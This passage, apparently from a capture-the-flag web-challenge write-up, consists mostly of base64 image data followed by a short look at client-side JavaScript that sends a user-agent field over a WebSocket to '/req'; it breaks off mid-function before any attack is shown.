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s9eNiEga5Y2IiIhMn055MzTrw4b/8lh4caUPxJrW9brN4eFBlysXkZGpnDy5TLxK3cGBJ7sXEVmbUd6IiIjI9IlXG3tqb7h/y6aw4ab0MubxylvFFZ0ODrpS2UrLkQe6h4Ctu+GWcPcXh11NTUTGyen9m5MrVm0O2/ceKa5S1zCtiMhajvJGRERERERERKTFUd6IiIiIiIiIiLQ4yhsRERERERERkRZHeSMiIiIiIiIi0uIob0REREREREREWhzljYiIiIiIiIhIi6O8ERERERERERFpcZQ3IiIiIiIiIiItjvJGRERERERERKTFUd6IiIiIiIiIiLQ4yhsRERERERERkRZHeSMiIiIiIiIi0uIob0REREREREREWhzljYiIiIiIiIhIi6O8ERERERERERFpcZQ3IiIiIiIiIiItjvJGRERERERERKTFWbby5tSpU+Htt99uXAgREREREREREelP7FJipzKticqbs2fPhjfeeKNxQUREREREREREpD+xS4mdyrQmKm8uXboUDh48GI4dOxaOHz8enn/+eRERERERERERaUjsTo4ePZp3KbFTmdZE5U0UZxbbori7TzxeS0RERERERERE+hO7k9ihzFLcRBOXNwAAAAAsH+UNAAAAQIspbwAAAABaTHkDAAAA0GLKGwAAAIAWU94AAAAAtJjyBgAAAKDFlDcAAAAALaa8AQAAAGgx5Q0AAABAiylvAAAAAFpMeQMAAADQYsobAAAAgBZT3gAAAAC0mPIGAAAAoMWUNwAAAAAtprwBAAAAaDHlDQAAAECLKW8AAAAAWkx5AwAAANBiyhsAAACAFlPeAAAAALSY8gYAAACgxZQ3AAAAAC2mvAEAAABoMeUNAAAAQIspbwAAAABaTHkDAAAA0GLKGwAAAIAWU94AAAAAtJjyBgAAAKDFJi5vnv3s+8M1nz1W/lQ17L7lkM//fZ8Lz5Y/AwAAAKx0q6e8OfNouP19fxBu/0/vDzt+WN521RwLO97XhuUAAAAAVrpVU94sPfoH+bzz//6nR8NSefvVobwBAAAA5mOx5U2+N0x2Wye1UiWfvnv/H4SvninviH74uey2z4Vn8//2P7bq9fDV7h43sTipPVdXUap055kta9P6jLVctXXrFjWd5W26DwAAAGBCCyxv6nufvB6++tleAdP3PHnpkRQlnRJkwLwqOoVK+WPz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) Let's check in the source code to see why that is... on submission of that form we can see a websocket request is sent to `/req` containing what we entered, and the response is alerted back to us, hence the error in the alert. ```jsfunction submit_form(e) { e.preventDefault(); data = { "uAgent": document.getElementById("userAgentInput").value, } if (data.uAgent == "") { alert("Missing data.") return } var ws = new WebSocket("ws://" + location.host + "/req"); ws.onopen = function () { 